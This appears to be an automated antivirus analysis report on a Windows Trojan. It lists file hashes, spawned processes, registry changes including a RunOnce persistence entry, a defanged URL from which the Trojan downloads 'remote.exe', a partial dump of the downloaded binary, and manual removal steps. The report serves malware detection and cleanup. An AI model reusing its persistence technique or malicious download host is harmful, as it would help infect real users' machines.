MD5: cdec5bda17b9b80ba29c74a86545345b
SHA1: 05364849c4f03f11dc8091783edd029655df198c
SHA256: 381447c3ba7bf64f01950dc2eed4284704d37320ee39eda11652495f7f97416f
SSDeep: 24576:hiR3QuhFhvROg teCSUPpfMxHuIgflJwtsTcwHBvCHmSbOAznn42mvK78zxKtSpp:BGD5UJ4c0y0HPODNKwVQsEhccggAYZE
Size: 3000320 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2016-11-07 06:15:33
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

KNKM4Z122F.exe:2836
%original file name%.exe:1072

The Trojan injects its code into the following process(es):

KNKM4Z122F.exe:4024

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1072 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\KNKM4Z122F.exe (25659 bytes)

Registry activity

The process KNKM4Z122F.exe:2836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process KNKM4Z122F.exe:4024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_WBNB9" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\KNKM4Z122F.exe"

The process %original file name%.exe:1072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\wewewe]
"partner" = "idsc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\cdec5bda17b9b80ba29c74a86545345b_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cdec5bda17b9b80ba29c74a86545345b_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\wewewe]
"Product" = "unknown"

[HKLM\SOFTWARE\Microsoft\Tracing\cdec5bda17b9b80ba29c74a86545345b_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\wewewe]
"channel" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\cdec5bda17b9b80ba29c74a86545345b_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cdec5bda17b9b80ba29c74a86545345b_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cdec5bda17b9b80ba29c74a86545345b_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\cdec5bda17b9b80ba29c74a86545345b_RASMANCS]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: SFW4E%JQ
Product Name: S
Product Version: 8.7.3.3
Legal Copyright: Copyright (c) 2016
Legal Trademarks:
Original Filename: TikTak.exe
Internal Name: TikTak.exe
File Version: 8.7.3.3
File Description: SFW4E
Comments: S
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://weminternal.com/get/4/remote.exe	46.105.121.115

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /get/4/remote.exe HTTP/1.1

Host: weminternal.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Tue, 22 Nov 2016 13:14:34 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="remote.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
55c00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...Z 4X.........."...0..B..........B`... ........@.. .................
...................@.................................._..O............
........................^.............................................
.. ............... ..H............text...H@... ...B.................. 
..`.rsrc................D..............@..@.reloc...............Z.....
.........@..B................$`......H.......,"...............3... ...
.........................................(....*..(....*.~....-.r...p..
...(....o....s.........~....*.~....*.......*.~....*..(....*Vs....(....
t.........*.0..M.......(.....o......s....%o......o....o ......&...%..|
.o!................(....("...*..-.r=..ps#...z.($...o%...%-.rk..ps#...z
.......%...o&...&*..0...........(".....('....o(...s).... o*....s ...%.
o,...%.o-....('....o(...o......s/.......s0.....i.4.....%......io1.....
.o....o....(2........o3...r...p(4...o5...*..0..........r...p(.......(.
.....&..*................BSJB............v2.0.50727......l...D...#~...
.......#Strings............#US.........#GUID.......D...#Blob..........
.WU.........3........4...................5............................
.................\...............3.......P............................
.................6.......c.....c...Q.......(...n.(.........W. ...T. ..
.........P...g.............q...?...........!.\.........:............. 
..... ..... .........,.\................. ..... ..... ............
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.ri3J

-yiq.yiw

-yiq.yi

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   KNKM4Z122F.exe:2836
   %original file name%.exe:1072

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\KNKM4Z122F.exe (25659 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
   "OMEWPRODUCT_WBNB9" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\KNKM4Z122F.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.